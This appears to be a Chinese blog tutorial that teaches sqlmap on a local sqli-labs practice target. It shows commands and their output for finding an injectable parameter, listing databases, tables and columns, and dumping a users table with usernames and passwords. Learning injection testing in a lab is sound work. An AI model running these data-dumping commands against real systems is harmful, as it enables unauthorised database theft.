【web安全】SQL注入漏洞3--sqlmap工具教程

引言

我们在前面的文章已经介绍了SQL注入的挖掘方法以及渗透利用方法,这篇文章,我们学习一下如何利用工具高效的进行sqlmap 的渗透利用。 我们知道,手工制作payload并渗透利用是最基本的能力,但是这种方式的进展缓慢,不利于在实战中快速高效的扩大战果, 那么,有没有快速利用的工具呢? 答案是有的,前辈们早就开发了许多自动化利用的工具, 今天我们学习一个非常好用的SQL注入工具,sqlmap.

这篇文章主要关注如下内容:

  • 只讲工具的利用思路,不会详细罗列工具的每个命令参数。
  • 以靶场为例来展开对sqlmap的使用介绍。

sqlmap教程

sqlmap的安装

sqlmap的安装还是比较简单的,网上一搜就可以搜到。 在linux操作系统和window操作系统都是可以安装的。

  • 笔者在安装后遇到一个小问题,我是在本地搭建的一个sqli lab靶场,需要通过127.0.0.1本地访问才可以。 但是由于系统的代理问题,在cmd中无法直接访问靶场web页面,这里找到一个临时解决方案,就是代理地址删除掉即可
    笔者使用的windows环境下的解决方案:
    cmd中执行下面命令
set http_proxy=
set https_proxy=

sqlmap的使用

有了自动化工具,就方便了许多, 我们不需要再一个一个手工的构造payload 然后尝试在参数中添加符号进行测试;我们只需要在工具中输入一个url,sqlmap就可以自动识别url中的参数并构造payload探测。

  • 例如, 我们在靶场中的url 为:
    http://127.0.0.1/Less-1/?id=1

我们可以执行如下命令进行探测:

sqlmap.py -u http://127.0.0.1/Less-1/?id=1

如果有漏洞,则sqlmap会显示存在漏洞的具体参数。若有多个参数,可以按回车键依次进行sql注入漏洞的测试。 
  • 获取当前用户下的所有数据库:
sqlmap.py -u http://127.0.0.1/Less-1/?id=1 --dbs

结果如下: 
available databases [7]:
[*] challenges
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] sys
  • 探测数据库中有几个表
python sqlmap.py -u http://127.0.0.1:81/Less-1?id=1 -D security --tables
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+
  • 探测表中有哪些字段
python sqlmap.py -u http://127.0.0.1:81/Less-1?id=1 -D security -T users --columns
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
  • 把表的内容输出出来
python sqlmap.py -u http://127.0.0.1:81/Less-1?id=1 -D security -T users -C id,password,username --dump
+----+------------+----------+
| id | p  word    | name |
+----+------------+----------+
| 1  | Dumb       | Dumb     |
| 2  | I-kill-you | Angelina |

总结

这篇文章,我们学习了sqlmap工具的使用思路。了解了这些基本的使用方法,后续就知道我们怎么自动化进行sql注入漏洞了。 当然,sqlmap的各种高级用法还有很多,本文没有全面讲解所有的命令, 我们在学习或者实战的过程中, 只要有一个明确的思路,然后需要到什么知识点,网上搜索查询并慢慢积累便可。 后续会在演练或者实战过程中不断提升自身能力。

参考资料:
https://blog.csdn.net/weixin_59679023/article/details/123503849
https://zhuanlan.zhihu.com/p/394955217
https://github.com/sqlmapproject/sqlmap

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值